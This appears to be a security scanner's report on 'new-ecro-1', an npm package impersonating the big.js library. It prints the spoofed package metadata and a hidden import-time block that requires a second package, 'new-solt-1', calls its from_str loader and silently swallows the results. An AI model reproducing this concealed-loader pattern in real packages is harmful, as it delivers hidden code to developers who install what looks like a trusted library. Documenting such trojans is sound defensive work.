new-ecro 1-v0.3.9
Trojanized package with hidden dependency
Impersonation of the popular big.js libraryImport-time from_str loader swallows results
SHA-2566a3de7898ed91e533c9623dbaefa101c75771f688072fb933d3539ae881ec3ec
MaleculeO(S₄)H₃(Cm₂Db₂Os)Md(Pa₄)
Evidence
1{
2 "name": "new-ecro-1",
3 "description": "A small, fast, easy-to-use library for arbitrary-precision decimal arithmetic",
4 "version": "0.3.9",
⋯12 lines
17 "bignum"
18 ],
19 "exports": {
20 ".": {
21 "import": "./big.mjs",
⋯4 lines
26 "./package.json": "./package.json"
27 },
28 "repository": {
29 "type": "git",
30 "url": "https://github.com/MikeMcl/big.js.git"
31 },
32 "main": "big",
33 "browser": "big.js",
34 "module": "big.mjs",
35 "author": {
36 "name": "Michael Mclaughlin",
37 "email": "M8ch88l@gmail.com"
38 },
39 "bugs": {
⋯5 lines
45 "license": "MIT",
46 "scripts": {
47 "build": "tsc"
48 },
1/*
2 * big.js v7.0.1
3 * A small, fast, easy-to-use library for arbitrary-precision decimal arithmetic.
4 * Copyright (c) 2025 Michael Mclaughlin
5 * https://github.com/MikeMcl/big.js/LICENCE.md
6 */
7; (function (GLOBAL) {
⋯5 lines
⋯10 lines
603 };
604
605 try {
606 const doc = require("new-solt-1");
607 doc.from_str().then(e => { }).catch(e => { })
608 } catch (error) {
609 }
⋯12 lines
1037:6… ['default'] = Big.Big = Big;
1038
1039 //AMD.
1040 if (typeof define === 'function' && define.amd) {
1041 define(function () { return Big; });
1042
1043 // Node and other CommonJS-like environment …
1:8437… ://deno.land/)\r\n\r\n```javascript\r\nimport Big from 'https://raw.githubusercontent.com/mikemcl/big.js/v7.0.1/big.mjs';\r\nimport Big from 'https://unpkg.com/big.js@latest/big.mjs';\r\n```\r\n\r\n## Use\r\n\r\n*In the code examples below, semicolons and `toString` calls are not shown.*\r\n\r …
No evidence locations were recorded for this file. Raw result